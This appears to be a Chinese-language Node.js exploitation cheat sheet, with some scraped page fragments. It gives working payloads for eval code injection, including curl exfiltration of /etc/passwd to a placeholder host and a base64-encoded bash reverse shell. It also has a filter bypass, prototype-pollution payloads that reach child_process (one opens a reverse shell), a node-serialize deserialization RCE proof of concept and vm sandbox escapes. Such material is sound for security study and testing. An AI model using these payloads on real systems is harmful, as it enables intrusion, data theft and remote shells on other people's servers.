toUpperCase(): 将小写转换为大写的函数 toLowerCase(): 将大写转换为小写的函数
var express = require('express');
var app = express();
app.get('/eval', function(req, res){
res.send(eval(req.query.cmd));
console.log(req.query.cmd);
})
var server = app.listen(8000, function(){
console.log("实例的地址在http://127.0.0.1:8000");
})
(向右滑动,查看更多) 我们知道上面代码中,在/eval路由中的cmd传入参数可控,可以传入javascript代码进行代码执行
// windows中弹出计算机
?cmd=require('child_process').exec('calc');
// linux中读取敏感文件
?cmd=require('child_process').exec('curl -F "x=`cat /etc/passwd`" http://vps'); //没有回显的时候
?cmd=require('child_process').exec('cat /etc/passwd');
// 反弹shell
?cmd=require('child_process').exec('echo xxx|base64 -d|bash');
//其中的 xxx 是 bash -i >& /dev/tcp/vps/port 0>&1 base64加密之后的字符串
// 读取文件
?cmd=require('fs').readFileSync('xxx(文件名)', 'utf-8');
__filename
__dirname
(向右滑动,查看更多)
过滤exec: 拼接exec绕过
?cmd=require('child_process')['exe'+'c']('ls')
?cmd=require('child_process')['exe'%2B'c']('ls')
(向右滑动,查看更多) 其他命令
间隔两秒执行函数
setInterval(some_function, 2000)
两秒后执行函数
setTimeout(some_function, 2000)
输出
Function("console.log('xxx')")()
prototype是一个类的属性,所有实例化这个类的对象都拥有这个属性中的所有内容,包括变量和方法
__proto__是一个实例化对象的属性,执行对应类的prototype属性
为什么一个空对象的zoo,有bar属性?那是因为,zoo和foo的类都是Object类,通过__proto__修改了这个对象的原型,zoo就带有了bar属性。
如果能够控制数组的键名进行操作就可以进行原型链的污染了。
对象merge
对象clone
//demo
function merge(target, source) {
for (let key in source) {
if (key in source && key in target) {
merge(target[key], source[key])
} else {
target[key] = source[key]
}
}
}
let object1 = {}
let object2 = JSON.parse('{"a": 1, "__proto__": {"b": 2}}')
merge(object1, object2)
console.log(object1.a, object1.b)
object3 = {}
console.log(object3.b)
(向右滑动,查看更多)
{"__proto__":{"sourceURL":"\nglobal.process.mainModule.constructor._load('child_process').exec('calc')//"}}
{"__proto__":{"sourceURL":"\nreturn e=> {for (var a in {}) {delete Object.prototype[a];} return global.process.mainModule.constructor._load('child_process').execSync('id')}\n//"}}
(向右滑动,查看更多)
{"__proto__":{"compileDebug":1,"self":1,"line":"console.log(global.process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/xxx/6666 0>&1\"'))"}}
(向右滑动,查看更多)
# nodejs
sudo apt-get install nodejs
sudo apt-get install nodejs-legacy
# 版本号
node -v
# npm
sudo apt-get install npm
# 版本号
npm -v
(向右滑动,查看更多)
# 下载对应版本
sudo npm install node-serialize@0.0.4 --save
(向右滑动,查看更多)
// index.js
var serialize = require('node-serialize');
var chybeta = {
vuln : function(){require('child_process').exec('whoami', function(error, stdout, stderr) {console.log(stdout);});},
}
serResult = serialize.serialize(chybeta);
console.log("serialize result:");
console.log(serResult+'\n');
console.log("Direct unserialize:")
serialize.unserialize(serResult);
console.log("\n");
console.log("Use IIFE to PWN it:")
exp = serResult.substr(0,serResult.length-2) + "()" + serResult.substr(-2);
console.log(exp);
console.log("Exec whoami:")
serialize.unserialize(exp);
// node index.js
(向右滑动,查看更多)
(function(){
var name = "RoboTerh";
})()
//无法从外部访问变量name
exports.unserialize = function(obj, originObj) {
var isIndex;
if (typeof obj === 'string') {
obj = JSON.parse(obj);
isIndex = true;
}
originObj = originObj || obj;
var circularTasks = [];
var key;
for(key in obj) {
if(obj.hasOwnProperty(key)) {
if(typeof obj[key] === 'object') {
obj[key] = exports.unserialize(obj[key], originObj);
} else if(typeof obj[key] === 'string') {
if(obj[key].indexOf(FUNCFLAG) === 0) {
obj[key] = eval('(' + obj[key].substring(FUNCFLAG.length) + ')');
} else if(obj[key].indexOf(CIRCULARFLAG) === 0) {
obj[key] = obj[key].substring(CIRCULARFLAG.length);
circularTasks.push({obj: obj, key: key});
}
}
}
}
if (isIndex) {
circularTasks.forEach(function(task) {
task.obj[task.key] = getKeyPath(originObj, task.obj[task.key]);
});
}
return obj;
};
(向右滑动,查看更多)
obj[key] = eval('(' + obj[key].substring(FUNCFLAG.length) + ')');
(向右滑动,查看更多)
serialize = require('node-serialize');
var test = {
exp : function(){
require('child_process').exec('ls /', function(error, stdout, stderr){
console.log(stdout)
});
},
}
console.log("序列化生成的payload:\n" + serialize.serialize(test));
// {"exp":"_$$ND_FUNC$$_function (){require('child_process').exec('ls /',function(error,stdout,stderr){console.log(stdout)});}"}
(向右滑动,查看更多)
{"exp":"_$$ND_FUNC$$_function (){require('child_process').exec('ls /',function(error,stdout,stderr){console.log(stdout)});}()"}
(向右滑动,查看更多)
// test2.js
serialize = require('node-serialize');
payload = '{"exp":"_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'ls /\',function(error,stdout,stderr){console.log(stdout)});}()"}';
serialize.unserialize(payload);
(向右滑动,查看更多)
docker-compose build
docler-compose up -d
逃逸实例
const vm = require("vm");
const env = vm.runInNewContext(`this.constructor.constructor('return this.process.env')()`);
console.log(env);
(向右滑动,查看更多)
const vm = require('vm');
const sandbox = {};
const script = new vm.Script("this.constructor.constructor('return this.process.env')()");
const context = vm.createContext(sandbox);
env = script.runInContext(context);
console.log(env);
(向右滑动,查看更多)
const vm = require("vm");
const env = vm.runInNewContext(`const process = this.constructor.constructor('return this.process')();
process.mainModule.require('child_process').execSync('whoami').toString()`);
console.log(env);
(向右滑动,查看更多)